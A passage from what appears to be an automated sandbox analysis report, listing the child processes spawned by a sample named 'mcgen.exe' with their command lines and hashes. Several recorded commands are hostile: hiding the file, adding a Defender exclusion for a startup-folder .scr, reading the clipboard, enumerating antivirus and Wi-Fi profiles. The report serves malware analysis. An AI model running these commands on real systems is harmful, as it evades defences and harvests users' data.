                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                  Start time:03:22:05
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                                  Start time:03:22:05
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                  Start time:03:22:06
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7da280000
                                                                                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                  Start time:03:22:06
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                  Start time:03:22:06
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                  Start time:03:22:06
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7da280000
                                                                                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                  Start time:03:22:06
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                  Start time:03:22:06
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                  Start time:03:22:07
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5c80000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                  Start time:03:22:08
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                  Start time:03:22:08
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                  Start time:03:22:08
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5c80000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                  Start time:03:22:09
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\mcgen.exe""
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                                  Start time:03:22:09
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                  Start time:03:22:09
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                                  Start time:03:22:09
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6995b0000
                                                                                                                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                                  Start time:03:22:09
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                  Start time:03:22:09
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                  Start time:03:22:10
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                                                  Start time:03:22:10
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                                                  Start time:03:22:10
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                                                  Start time:03:22:10
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                                                  Start time:03:22:10
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b4290000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                                                  Start time:03:22:10
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                                                                  Start time:03:22:10
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b4290000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
